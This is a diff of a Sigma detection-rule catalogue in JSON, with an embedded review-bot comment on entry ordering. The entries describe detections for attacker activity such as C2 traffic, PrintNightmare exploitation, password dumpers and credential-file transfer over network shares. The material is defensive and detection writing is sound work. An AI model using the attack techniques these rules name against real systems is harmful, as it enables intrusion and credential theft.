@@ -10827,6 +1070,164 @@ "uuid": "f1b3a22a-45e6-4004-afb5-4291f9c21166", "value": "Suspicious PsExec Execution - Zeek" }, + { + "description": "NKN is a networking service using blockchain technology to support a decentralized network of peers. While there are legitimate uses for it, it can also be used as a C2 channel. This rule looks for a DNS request to the ma>", + "meta": { + "author": "Michael Portera (@mportatoes)", + "creation_date": "2022/04/21", + "falsepositive": [ + "Unknown" + ], + "filename": "zeek_dns_nkn.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://github.com/nknorg/nkn-sdk-go", + "https://github.com/Maka8ka/NGLite", + "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_nkn.yml" + ], + "tags": [ + "attack.command_and_control" + ] + }, + "uuid": "fa7703d6-0ee8-4949-889c-48c84bc15b6f", + "value": "New Kind of Network (NKN) Detection" + }, + { + "description": "Windows DCE-RPC functions which indicate a persistence techniques on the remote system. 
All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE.", + "meta": { + "author": "@neu5ron, SOC Prime", + "creation_date": "2020/03/19", + "falsepositive": [ + "Windows administrator tasks or troubleshooting", + "Windows management scripts or software" + ], + "filename": "zeek_dce_rpc_mitre_bzar_persistence.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://github.com/mitre-attack/bzar#indicators-for-attck-persistence", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.004" + ] + }, + "uuid": "53389db6-ba46-48e3-a94c-e0f2cefe1583", + "value": "MITRE BZAR Indicators for Persistence" + }, + { + "description": "Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", + "meta": { + "author": "OTR (Open Threat Research), @neu5ron", + "creation_date": "2018/11/28", + "falsepositive": [ + "Domain Controllers that are sometimes, commonly although should not be, acting as printer servers too" + ], + "filename": "zeek_dce_rpc_smb_spoolss_named_pipe.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", + "https://twitter.com/_dirkjan/status/1309214379003588608", + "https://dirkjanm.io/a-different-way-of-abusing-zerologon/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "bae2865c-5565-470d-b505-9496c87d0c30", + "value": "SMB Spoolss Name Piped Usage" + }, + { + "description": "Domain user and group enumeration via network 
reconnaissance.\nSeen in APT 29 and other common tactics and actors. Detects a set of RPC (remote procedure calls) used to enumerate a domain controller.\nThe rule was created based off the datasets and hackathon from https://github.com/OTRF/detection-hackathon-apt29\n", + "meta": { + "author": "Nate Guagenti (@neu5ron), Open Threat Research (OTR)", + "creation_date": "2020/05/03", + "falsepositive": [ + "Devices that may do authentication like a VPN or a firewall that looksup IPs to username", + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "zeek_dce_rpc_domain_user_enumeration.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/37", + "https://github.com/OTRF/detection-hackathon-apt29", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_domain_user_enumeration.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.002", + "attack.t1082" + ] + }, + "uuid": "66a0bdc6-ee04-441a-9125-99d2eb547942", + "value": "Domain User Enumeration Network Recon 01" + }, + { + "description": "Identifies clients that may be performing DNS lookups associated with common currency mining pools.", + "meta": { + "author": "Saw Winn Naung, Azure-Sentinel, @neu5ron", + "creation_date": "2021/08/19", + "falsepositive": [ + "A DNS lookup does not necessarily mean a successful attempt, verify a) if there was a response using the zeek answers field, if there was then verify the connections (conn.log) to those IPs. b) verify if HTTP, SSL, or TLS activity to the domain that was queried. http.log field is 'host' and ssl/tls is 'server_name'." 
+ ], + "filename": "zeek_dns_mining_pools.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://github.com/Azure/Azure-Sentinel/blob/fa0411f9424b6c47b4d5a20165e4f1b168c1f103/Detections/ASimDNS/imDNS_Miners.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_mining_pools.yml" + ], + "tags": [ + "attack.t1569.002", + "attack.t1496" + ] + }, + "uuid": "bf74135c-18e8-4a72-a926-0e4f47888c19", + "value": "DNS Events Related To Mining Pools" + }, + { + "description": "Detects the remote installation of a print driver which is possible indication of the exploitation of PrintNightmare (CVE-2021-1675).\nThe occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally and or through group policy.\n", + "meta": { + "author": "@neu5ron (Nate Guagenti)", + "creation_date": "2021/08/23", + "falsepositive": [ + "Legitimate remote alteration of a printer driver." 
+ ], + "filename": "zeek_dce_rpc_printnightmare_print_driver_install.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/", + "https://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek", + "https://old.zeek.org/zeekweek2019/slides/bzar.pdf", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", + "https://github.com/corelight/CVE-2021-1675", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml" + ], + "tags": [ + "attack.execution", + "cve.2021.1678", + "cve.2021.1675", + "cve.2021.34527" + ] + }, + "uuid": "7b33baef-2a75-4ca3-9da4-34f9a15382d8", + "value": "Possible PrintNightmare Print Driver Install" + }, { "description": "Detects known sensitive file extensions via Zeek", "meta": { @@ -10841,7 +1242,6 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ - "https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_susp_raccess_sensitive_fext.yml", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_susp_raccess_sensitive_fext.yml" ], "tags": [ 
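Review bot: The entries added in this hunk (`zeek_dns_nkn.yml`, `zeek_dce_rpc_mitre_bzar_persistence.yml`, `zeek_dce_rpc_smb_spoolss_named_pipe.yml`, `zeek_dce_rpc_domain_user_enumeration.yml`, `zeek_dns_mining_pools.yml`, `zeek_dce_rpc_printnightmare_print_driver_install.yml`) are the same records removed in the `@@ -10387,372` hunk with identical uuids, only at a different position and with a shuffled `refs` order (the PrintNightmare refs now open with the CrowdStrike URL instead of the MS-PAR spec, and the spoolss refs swap the Twitter and dirkjanm links), which suggests the generator serializes entries and refs in set or directory-listing order rather than sorted; the `@@ -10851,6` and `@@ -10816,7` hunks show the same symptom. Sorting entries by `uuid` (or `meta.filename`) and sorting each `refs` array before writing the cluster would make the file reproducible and keep future diffs limited to rules whose content actually changed, which matters for a file consumers will diff to spot detection-content changes. The NKN description still ends mid-word at `This rule looks for a DNS request to the ma>`, so that text appears truncated either upstream or during extraction and is worth checking before it lands. Finally, `"logsource.category": "No established category"` is a sentinel string standing in for an absent value; omitting the key (or emitting `null`) would be less surprising for consumers that filter on `logsource.category`.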
@@ -10851,6 +1251,30 @@ "uuid": "286b47ed-f6fe-40b3-b3a8-35129acd43bc", "value": "Suspicious Access to Sensitive File Extensions - Zeek" }, + { + "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", + "meta": { + "author": "Samir Bousseaden, @neu5ron, Tim Shelton", + "creation_date": "2020/04/02", + "falsepositive": [ + "Update the excluded named pipe to filter out any newly observed legit named pipe" + ], + "filename": "zeek_smb_converted_win_lm_namedpipe.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://twitter.com/menasec1/status/1104489274387451904", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_lm_namedpipe.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "021310d9-30a6-480a-84b7-eaa69aeb92bb", + "value": "First Time Seen Remote Named Pipe - Zeek" + }, { "description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares", "meta": { @@ -10864,7 +1288,7 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ - "https://github.com/neo23x0/sigma/blob/373424f14574facf9e261d5c822345a282b91479/rules/windows/builtin/win_transferring_files_with_credential_data_via_network_shares.yml", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_transferring_files_with_credential_data.yml" ], "tags": [ 
@@ -10878,2449 +1302,2080 @@ "value": "Transferring Files with Credential Data via Network Shares - Zeek" }, { - "description": "Detects kerberos TGS request using RC4 encryption which may be indicative of kerberoasting", + "description": "The DNS Z flag is bit within the DNS protocol header that is, per the IETF design, meant to be used reserved (unused).\nAlthough recently it has been used in DNSSec, the value being set to anything other than 0 should be rare.\nOtherwise if it is set to non 0 and DNSSec is being used, then excluding the legitimate domains is low effort and high reward.\nDetermine if multiple of these files were accessed in a short period of time to further enhance the possibility of seeing if this was a one off or the possibility of larger sensitive file gathering.\nThis Sigma query is designed to accompany the Corelight Threat Hunting Guide, which can be found here: https://www3.corelight.com/corelights-introductory-guide-to-threat-hunting-with-zeek-bro-logs'\n", "meta": { - "author": "sigma", - "creation_date": "2020/02/12", + "author": "@neu5ron, SOC Prime Team, Corelight", + "creation_date": "2021/05/04", "falsepositive": [ - "Normal enterprise SPN requests activity" + "Internal or legitimate external domains using DNSSec. 
Verify if these are legitimate DNSSec domains and then exclude them.", + "If you work in a Public Sector then it may be good to exclude things like endswith \".edu\", \".gov\" and or \".mil\"" ], - "filename": "zeek_susp_kerberos_rc4.yml", + "filename": "zeek_dns_susp_zbit_flag.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ - "https://adsecurity.org/?p=3458", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_susp_kerberos_rc4.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1558.003" - ] - }, - "uuid": "503fe26e-b5f2-4944-a126-eab405cc06e5", - "value": "Kerberos Network Traffic RC4 Ticket Encryption" - }, - { - "description": "Detect update check performed by Advanced IP Scanner and Advanced Port Scanner", - "meta": { - "author": "Axel Olsson", - "creation_date": "2022/08/14", - "falsepositive": [ - "Legitimate use by administrators" - ], - "filename": "proxy_adv_ip_port_scanner_upd_check.yml", - "level": "medium", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://www.advanced-ip-scanner.com/", - "https://www.advanced-port-scanner.com/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_adv_ip_port_scanner_upd_check.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1590" - ] - }, - "uuid": "1a9bb21a-1bb5-42d7-aa05-3219c7c8f47d", - "value": "Advanced IP/Port Scanner Update Check" - }, - { - "description": "Detects suspicious user agent string of APT40 Dropbox tool", - "meta": { - "author": "Thomas Patzke", - "creation_date": "2019/11/12", - "falsepositive": [ - "Old browsers" - ], - "filename": "proxy_apt40.yml", - "level": "high", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "Internal research from Florian Roth", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_apt40.yml" - ], - "tags": [ - "attack.command_and_control", - 
"attack.t1071.001", - "attack.exfiltration", - "attack.t1567.002" - ] - }, - "uuid": "5ba715b6-71b7-44fd-8245-f66893e81b3d", - "value": "APT40 Dropbox Tool User Agent" - }, - { - "description": "Detects specific malware patterns used by FurBall malware linked to Iranian Domestic Kitten APT group", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/02/08", - "falsepositive": [ - "Unlikely" - ], - "filename": "proxy_apt_domestic_kitten.yml", - "level": "high", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_apt_domestic_kitten.yml" + "https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma", + "https://tools.ietf.org/html/rfc2929#section-2.1", + "https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS", + "https://twitter.com/neu5ron/status/1346245602502443009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_susp_zbit_flag.yml" ], "tags": [ + "attack.t1095", + "attack.t1571", "attack.command_and_control" ] }, - "uuid": "6c939dfa-c710-4e12-a4dd-47e1f10e68e1", - "value": "Domestic Kitten FurBall Malware Pattern" + "uuid": "ede05abc-2c9e-4624-9944-9ff17fdc0bf5", + "value": "Suspicious DNS Z Flag Bit Set" }, { - "description": "Detects Baby Shark C2 Framework communication patterns", + "description": "Detects suspicious Django web application framework exceptions that could indicate exploitation attempts", "meta": { - "author": "Florian Roth", - "creation_date": "2021/06/09", + "author": "Thomas Patzke", + "creation_date": "2017/08/05", "falsepositive": [ - "Unknown" + "Application bugs" ], - "filename": "proxy_baby_shark.yml", - "level": "critical", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - 
"https://nasbench.medium.com/understanding-detecting-c2-frameworks-babyshark-641be4595845", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_baby_shark.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "uuid": "304810ed-8853-437f-9e36-c4975c3dfd7e", - "value": "BabyShark Agent Pattern" - }, - { - "description": "Detects HTTP requests used by Chafer malware", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/01/31", - "falsepositive": [ - "Unknown" - ], - "filename": "proxy_chafer_malware.yml", - "level": "critical", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://securelist.com/chafer-used-remexi-malware/89538/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_chafer_malware.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "uuid": "fb502828-2db0-438e-93e6-801c7548686d", - "value": "Chafer Malware URL Pattern" - }, - { - "description": "Detects Malleable Amazon Profile", - "meta": { - "author": "Markus Neis", - "creation_date": "2019/11/12", - "falsepositive": [ - "Unknown" - ], - "filename": "proxy_cobalt_amazon.yml", - "level": "high", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/amazon.profile", - "https://www.hybrid-analysis.com/sample/ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_amazon.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "uuid": "953b895e-5cc9-454b-b183-7f3db555452e", - "value": "CobaltStrike Malleable Amazon Browsing Traffic Profile" - }, - { - "description": "Detects different malformed user agents used in Malleable Profiles used with Cobalt 
Strike", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/05/06", - "falsepositive": [ - "Unknown" - ], - "filename": "proxy_cobalt_malformed_uas.yml", - "level": "critical", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://github.com/yeyintminthuhtut/Malleable-C2-Profiles-Collection/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_malformed_uas.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "uuid": "41b42a36-f62c-4c34-bd40-8cb804a34ad8", - "value": "CobaltStrike Malformed UAs in Malleable Profiles" - }, - { - "description": "Detects Malleable (OCSP) Profile with Typo (OSCP) in URL", - "meta": { - "author": "Markus Neis", - "creation_date": "2019/11/12", - "falsepositive": [ - "Unknown" - ], - "filename": "proxy_cobalt_ocsp.yml", - "level": "high", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/ocsp.profile", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_ocsp.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "uuid": "37325383-740a-403d-b1a2-b2b4ab7992e7", - "value": "CobaltStrike Malleable (OCSP) Profile" - }, - { - "description": "Detects Malleable OneDrive Profile", - "meta": { - "author": "Markus Neis", - "creation_date": "2019/11/12", - "falsepositive": [ - "Unknown" - ], - "filename": "proxy_cobalt_onedrive.yml", - "level": "high", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/onedrive_getonly.profile", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_onedrive.yml" - ], - "tags": [ - 
"attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "uuid": "c9b33401-cc6a-4cf6-83bb-57ddcb2407fc", - "value": "CobaltStrike Malleable OneDrive Browsing Traffic Profile" - }, - { - "description": "Detects WebDav DownloadCradle", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/04/06", - "falsepositive": [ - "Administrative scripts that download files from the Internet", - "Administrative scripts that retrieve certain website contents", - "Legitimate WebDAV administration" - ], - "filename": "proxy_downloadcradle_webdav.yml", - "level": "high", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_downloadcradle_webdav.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "uuid": "e09aed7a-09e0-4c9a-90dd-f0d52507347e", - "value": "Windows WebDAV User Agent" - }, - { - "description": "Detects download of certain file types from hosts with dynamic DNS names (selected list)", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/11/08", - "falsepositive": [ - "Software downloads" - ], - "filename": "proxy_download_susp_dyndns.yml", + "filename": "appframework_django_exceptions.yml", "level": "medium", - "logsource.category": "proxy", - "logsource.product": "No established product", + "logsource.category": "application", + "logsource.product": "django", "refs": [ - "https://www.alienvault.com/blogs/security-essentials/dynamic-dns-security-and-potential-threats", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_download_susp_dyndns.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1105", - "attack.t1568" - ] - }, - "uuid": "195c1119-ef07-4909-bb12-e66f5e07bf3c", - "value": "Download from Suspicious Dyndns Hosts" - }, - { - "description": 
"Detects download of certain file types from hosts in suspicious TLDs", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/11/07", - "falsepositive": [ - "All kinds of software downloads" - ], - "filename": "proxy_download_susp_tlds_blacklist.yml", - "level": "low", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://www.symantec.com/connect/blogs/shady-tld-research-gdn-and-our-2016-wrap", - "https://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf", - "https://www.spamhaus.org/statistics/tlds/", - "https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_download_susp_tlds_blacklist.yml" + "https://docs.djangoproject.com/en/1.11/ref/exceptions/", + "https://docs.djangoproject.com/en/1.11/topics/logging/#django-security", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/django/appframework_django_exceptions.yml" ], "tags": [ "attack.initial_access", - "attack.t1566", - "attack.execution", - "attack.t1203", - "attack.t1204.002" + "attack.t1190" ] }, - "uuid": "00d0b5ab-1f55-4120-8e83-487c0a7baf19", - "value": "Download from Suspicious TLD" + "uuid": "fd435618-981e-4a7c-81f8-f78ce480d616", + "value": "Django Framework Exceptions" }, { - "description": "Detects executable downloads from suspicious remote systems", + "description": "Detects a highly relevant Antivirus alert that reports a password dumper", "meta": { "author": "Florian Roth", - "creation_date": "2017/03/13", + "creation_date": "2018/09/09", "falsepositive": [ - "All kind of software downloads" + "Unlikely" ], - "filename": "proxy_download_susp_tlds_whitelist.yml", - "level": "low", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_download_susp_tlds_whitelist.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1566", - 
"attack.execution", - "attack.t1203", - "attack.t1204.002" - ] - }, - "uuid": "b5de2919-b74a-4805-91a7-5049accbaefe", - "value": "Download EXE from Suspicious TLD" - }, - { - "description": "Detects user agent and URI paths used by empire agents", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/07/13", - "falsepositive": [ - "Valid requests with this exact user agent to server scripts of the defined names" - ], - "filename": "proxy_empire_ua_uri_combos.yml", - "level": "high", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://github.com/BC-SECURITY/Empire", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_empire_ua_uri_combos.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "uuid": "b923f7d6-ac89-4a50-a71a-89fb846b4aa8", - "value": "Empire UserAgent URI Combo" - }, - { - "description": "Detects suspicious empty user agent strings in proxy logs", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/07/08", - "falsepositive": [ - "Unknown" - ], - "filename": "proxy_empty_ua.yml", - "level": "medium", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://twitter.com/Carlos_Perez/status/883455096645931008", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_empty_ua.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "uuid": "21e44d78-95e7-421b-a464-ffd8395659c4", - "value": "Empty User Agent" - }, - { - "description": "Detects URL pattern used by iOS Implant", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/08/30", - "falsepositive": [ - "Unknown" - ], - "filename": "proxy_ios_implant.yml", + "filename": "av_password_dumper.yml", "level": "critical", - "logsource.category": "proxy", + "logsource.category": "antivirus", "logsource.product": "No established 
product", "refs": [ - "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html", - "https://twitter.com/craiu/status/1167358457344925696", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ios_implant.yml" + "https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/", + "https://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619/detection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_password_dumper.yml" ], "tags": [ - "attack.execution", - "attack.t1203", - "attack.collection", - "attack.t1005", - "attack.t1119", "attack.credential_access", - "attack.t1528", - "attack.t1552.001" + "attack.t1003", + "attack.t1558", + "attack.t1003.001", + "attack.t1003.002" ] }, - "uuid": "e06ac91d-b9e6-443d-8e5b-af749e7aa6b6", - "value": "iOS Implant URL Pattern" + "uuid": "78cc2dd2-7d20-4d32-93ff-057084c38b93", + "value": "Antivirus Password Dumper Detection" }, { - "description": "Detects Java class download in proxy logs, e.g. 
used in Log4shell exploitation attacks against Log4j.", + "description": "Detects the suspicious file that is created from PoC code against Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare), CVE-2021-1675 .", "meta": { - "author": "Andreas Hunkeler (@Karneades)", - "creation_date": "2021/12/21", + "author": "Sittikorn S, Nuttakorn T, Tim Shelton", + "creation_date": "2021/07/01", "falsepositive": [ - "Unknown" + "Unlikely, or pending PSP analysis" ], - "filename": "proxy_java_class_download.yml", - "level": "high", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://www.lunasec.io/docs/blog/log4j-zero-day/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_java_class_download.yml" - ], - "tags": [ - "attack.initial_access" - ] - }, - "uuid": "53c15703-b04c-42bb-9055-1937ddfb3392", - "value": "Java Class Proxy Download" - }, - { - "description": "Detects Windows PowerShell Web Access", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/03/13", - "falsepositive": [ - "Administrative scripts that download files from the Internet", - "Administrative scripts that retrieve certain website contents" - ], - "filename": "proxy_powershell_ua.yml", - "level": "medium", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://msdn.microsoft.com/powershell/reference/5.1/microsoft.powershell.utility/Invoke-WebRequest", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_powershell_ua.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "uuid": "c8557060-9221-4448-8794-96320e6f3e74", - "value": "Windows PowerShell User Agent" - }, - { - "description": "Detects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity", - "meta": { - "author": "Florian Roth", - "creation_date": 
"2020/04/15", - "falsepositive": [ - "Unknown" - ], - "filename": "proxy_pwndrop.yml", + "filename": "av_printernightmare_cve_2021_34527.yml", "level": "critical", - "logsource.category": "proxy", + "logsource.category": "antivirus", "logsource.product": "No established product", "refs": [ - "https://breakdev.org/pwndrop/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_pwndrop.yml" + "https://twitter.com/mvelazco/status/1410291741241102338", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_printernightmare_cve_2021_34527.yml" ], "tags": [ - "attack.command_and_control", - "attack.t1071.001", - "attack.t1102.001", - "attack.t1102.003" + "attack.privilege_escalation", + "attack.t1055" ] }, - "uuid": "2b1ee7e4-89b6-4739-b7bb-b811b6607e5e", - "value": "PwnDrp Access" + "uuid": "6fe1719e-ecdf-4caf-bffe-4f501cb0a561", + "value": "Antivirus PrinterNightmare CVE-2021-34527 Exploit Detection" }, { - "description": "Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form", + "description": "Detects an Antivirus alert in a highly relevant file path or with a relevant file name", "meta": { - "author": "Florian Roth", - "creation_date": "2019/12/05", + "author": "Florian Roth, Arnim Rupp", + "creation_date": "2018/09/09", "falsepositive": [ - "User activity (e.g. 
developer that shared and copied code snippets and used the raw link instead of just copy & paste)" + "Unlikely" ], - "filename": "proxy_raw_paste_service_access.yml", + "filename": "av_relevant_files.yml", "level": "high", - "logsource.category": "proxy", + "logsource.category": "antivirus", "logsource.product": "No established product", "refs": [ - "https://www.virustotal.com/gui/domain/paste.ee/relations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_raw_paste_service_access.yml" + "https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_relevant_files.yml" ], "tags": [ - "attack.command_and_control", - "attack.t1071.001", - "attack.t1102.001", - "attack.t1102.003", - "attack.defense_evasion" + "attack.resource_development", + "attack.t1588" ] }, - "uuid": "5468045b-4fcc-4d1a-973c-c9c9578edacb", - "value": "Raw Paste Service Access" + "uuid": "c9a88268-0047-4824-ba6e-4d81ce0b907c", + "value": "Antivirus Relevant File Paths Alerts" }, { - "description": "Detects a flashplayer update from an unofficial location", + "description": "Detects a highly relevant Antivirus alert that reports an exploitation framework", "meta": { "author": "Florian Roth", - "creation_date": "2017/10/25", + "creation_date": "2018/09/09", "falsepositive": [ - "Unknown flash download locations" + "Unlikely" ], - "filename": "proxy_susp_flash_download_loc.yml", - "level": "high", - "logsource.category": "proxy", + "filename": "av_exploiting.yml", + "level": "critical", + "logsource.category": "antivirus", "logsource.product": "No established product", "refs": [ - "https://gist.github.com/roycewilliams/a723aaf8a6ac3ba4f817847610935cfb", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_susp_flash_download_loc.yml" + "https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/", + 
